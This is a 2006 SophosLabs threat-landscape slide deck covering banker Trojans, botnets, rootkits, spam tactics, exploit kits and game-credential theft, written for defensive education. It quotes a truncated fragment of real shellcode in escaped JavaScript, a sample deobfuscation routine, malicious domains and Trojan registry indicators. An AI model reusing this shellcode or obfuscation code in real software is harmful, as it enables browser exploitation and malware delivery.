700 likes | 936 Views
Changes in the Threat Landscape . Beth Jones SophosLabs, Dec 2006. Outline. Overview of the current malware threat Overview of the current spam threat A more detailed look at the Threat Landscape Threat Trends and Techniques SophosLabs Looking forward Summary. SophosLabs.
E N D
Changes in the Threat Landscape Beth Jones SophosLabs, Dec 2006
Outline • Overview of the current malware threat • Overview of the current spam threat • A more detailed look at the Threat Landscape • Threat Trends and Techniques • SophosLabs • Looking forward • Summary
SophosLabs Overview of the current malware threat
Threat numbers • 3000 new malicious software threats per month • 300% rise in spam in May 2006
The profile of a virus writer is changing... • Virus writers now have a financial motive (phishing, stealing confidential data, denial of service extortion attempts, spam) • More organized criminals see that viruses and Trojan horses can help them make money • They are less likely to make the mistakes that the “old school” virus writers make of needing to show off to their friends • Law enforcement coordination required to stop international virus writing gangs
…to targeted attacks • Although large outbreaks make theheadlines, there are also attackstargeted on specific sites or businessrivals • Less likely to be noticed than a largeoutbreak • “Hacked to order” to steal informationor resources • Large outbreaks typically targetWindows PCs, but not necessary fortargeted attacks
Changing Threats • Most Trojans have spyware components • 140 Brazilian banking trojans a day were seen during the summer of 2005. • Total number of banker Trojans with individual IDs is 5500+ • Troj/Bank* - 3818 • Troj/Banc* 1839 • However now that we have Mal/Packer and the Mal/Banc behavioral genotypes there are probably many more thousands that we detect pro-actively • Similar trend with other spyware • Troj\Torpig-BJ
Keeping out of the news • Don’t want to draw attention • Strong evidence that they ‘test’ first. • Easier to steal from 200, than 200,000 • Specific targeted attacks • Easily deployed through spam. • Drop malware either directly or from website • Use a variety of techniques to ‘hide’ themselves • Self updating • Packing techniques • Malware toolkits for sale.
SophosLabs Overview of the current spam threat
By Country Stats • Malware - Nov 2006 • Based on ALL data • Spam Jul-Sep 2006
Changing face of Spam • Increase in ‘Image Only’ spam • Widely used for stock ‘Pump and Dump’ • Now being used for other types (Degree, Med etc). • Shorter campaigns • URLs used in campaigns lasting just a few minutes • Avoid URI blocking technologies • Abuse free hosting services • Free page redirects to spammers site. • Redirectors • TinyURL etc. • Free URL, that again redirect. • Eg. Kickme.to\spammer.it
Spam Example • Stock ‘pump-and-dump’ campaigns • No URL • Image only • Small image changes introduced to get around checksums
Facts & Figures • Dec 2005 • 135 Alerts (4-5 per day) • 1138 Identities (1-2 every hour) • ~1000 we didn’t alert on (but added) • 68% Trojans • Doesn’t include the ones we detect proactively • >4000 Banker Trojans detected with just 4 Genotype\Family identities • May 2006 • 84% Trojans
Web infection – stage 1 Workstations Email seed-list Email server Gateway SMTP SMTP ISP Attacker’s PC Attacker’s web
ISP Web infection – stage 2 Workstations Email server Gateway Attacker’s PC Attacker’s web
Backdoor Trojans • Client/Server (SubSeven) • Attacker uses a dedicated client program • IRC (Rbot) • Attacker uses a standard IRC client • Web (Bugbear) • Attacker uses an internet browser
Bots • Bot (Zombie, Drone) • A piece of code developed to emulate human behavior on a network, in computer security used to describe network spreading threats with payload that allows remote attacker to control resources owned by the infected machine • Control most frequently over IRC (TCP 6667 default port)
Definitions • Botnet (Zombie army) • A group of bots controlled by a single originator/hacker • The botnet owner usually sets up an IRC server that allows authenticated access for specific IRC bot clients bundled with network spreading worms • Botnet server often connected with other IRC botnet servers
Botnets Botnet 2 Botnet 1 + Botnet user(customer) + $ Botnet originator(owner) $
Rootkits • A rootkit is a set of tools (programs, utilities) used by an attacker in order to maintain access to a compromised system without his activity being detected by the system administrator. • Rootkits act by denying the listing of certain elements like processes, files, registry entries and TCP ports, falsely improving the user’s confidence that the machine has not been compromised
Normal system Application System Disk
Rootkit installed Application Rootkit System Disk
Changes in techniques • Malware authors are using newer or different tactics to try and maintain their element of surprise. • Techniques include • Obfuscation techniques • Packers/wrappers • Exploits
Obfuscation techniques • Packing • Aggressive development of packers & cryptors • Junk data/code • Added to make analysis more difficult • Code Injection • Masquerade as another process. Bypass local security (client firewall) • Persistence • Twinning procedures
Obfuscation – Code Injection • Masquerade as another process • Bypass local security (client firewall) • Change XOR key255 “variants” ^0x1b Troj/Dloadr-AMQ (Sep 2006)
Obfuscation – Code Injection • Browser Helper Objects (BHO) • Code “injection”? (well, silent loading at least) • Core of Adware- applications • < AVI: cimuz.avi > • BHO – sniff HTTP traffic • Often used in Banking trojans
Obfuscation – Persistence • Payloads to maintain persistence, eg: • Process termination • Process “twinning” • < AVI: zlob-twin.avi >
Exploit Usage • WebAttacker (demo) <wa-banker.avi> • OS & browser • IRC bots • LSASS (MS04-011), SRVSVC (MS06-040), RPC-DCOM (MS04-012), WKS (MS03-049) (CAN-2003-0812), PNP (MS05-039) and ASN.1 (MS04-007) • Troj/Animoo • Exp/WMF • ADODB (Psyme)
Troj/Tibs Obfuscated JS Exp/WMF Exp/CodeBase WebViewFolderIcon ADODB Stream Exp/Ani
Full Circle! http://frekasele.info http://west-best.info http://ariec.org Guru/JSShell Troj/Tibs Daxctle Dload-AQE Tool888 PUA Dload(Mal/Packer) Troj/LDPinch Dload(inj DLL) Backdoor http://www.perfectcodec.com Registered - 13th NovTroj/Zlob !!! Webroot: Hardcore porn “Require new Codec to view movie”
Troj/LDPinch • Password stealer, 2004-6, very active • HTTP POST B64 OS Process list SMTP cfg MAPI, POP3 credentials … …
ADODB - Psyme • “Utility” script • used in many campaigns • Downloaders, backdoors etc • Key part of infection mechanism • Spam URI to ADODB exploit
Troj/Proxy-EN • Installs stealthing proxy Trojan (via dropper) • PE: %sysdir%\protector.exe • SYS: HKLM\SYSTEM\CurrentControlSet\Services\ntio256 ImagePath = \??\C:\WINDOWS\System32\ntio256.sys DisplayName = "Input and output operations“ • Devicename? • \\.\poofpoof • IOControlCodes (3): • 0x220400 - registry • 0x220404 - files • 0x22040c - process
Obfuscated JavaScripts • Simple • “Kits” available • Not indicative of malicious • But certainly suggestive! • Various mechanisms • Char substitution • Unescaped • StrReverse • … … • Emulate? • Performance considerations shellcode = unescape("%u4343"+"%u4343"+"%u4343" + "%ua3e9%u0000%u5f00%ua164%u0030%u0000%u408b%u8b0c" + "%u1c70%u8bad%u0868%uf78b%u046a%ue859%u0043%u0000" + "%uf9e2%u6f68%u006e%u6800%u7275%u6d6c%uff54%u9516" + "%u2ee8%u0000%u8300%u20ec%udc8b%u206a%uff53%u0456" + function decrypt_p(x){var l=x.length,b=1024,i,j,r,p=0,s=0,w=0,t=Array(63,58,12,54,53,10,24,87,45,56,12 …);for(j=Math.ceil(l/b); j>0;j--){r='';for(i=Math.min(l,b);i>0;i--,l--){w|=(t[x.charCodeAt(p++)- 48])<<s;if(s){r+=String.fromCharCode(165^w&255); w>>=8;s-=2}else{s=6}}document.write(r)}} decrypt_p("WsuvPNgVPF@s3JX4jLixWtNtKj ...”)
Targetted Attacks • Exp/1Table (incl. MS06-027) • Malformed Word documents • Drop various backdoor & PWS Trojans • Exp/MS06-048 • Malformed PowerPoint presentations • CVE-2006-3590 • Drop Troj/Bifrose backdoor • Eastern origin, politically themed
Games • MMORPGs • Massive multiplayer online role-playing games • Financial scope • Young demographic • Real value (Lineage: >4m subscribers) • Phishing (since ~2002) • Trojans (since ~2003) W32/PrsKey-A (Oct 2005)“Priston’s Tale” keylogger, Yahoo! email W32/Looked (2005-6)“Lineage”, & “WoW” Prepender, pws, keylogger
Games • Mechanism? • Steal login credentials • Transfer items/goods within game • Sell for real cash • Banned by game manufacturers Cleric$200+ Priest$355+
Games • Denial of Service • Second Life, ‘Grey Goo’ • Next step? • Spyware (EULA) • API advancements
Who are SophosLabs? • A global group within Sophos engineering • 53 people • In 4 countries
What do SophosLabs do? Protect Sophos customers 24/7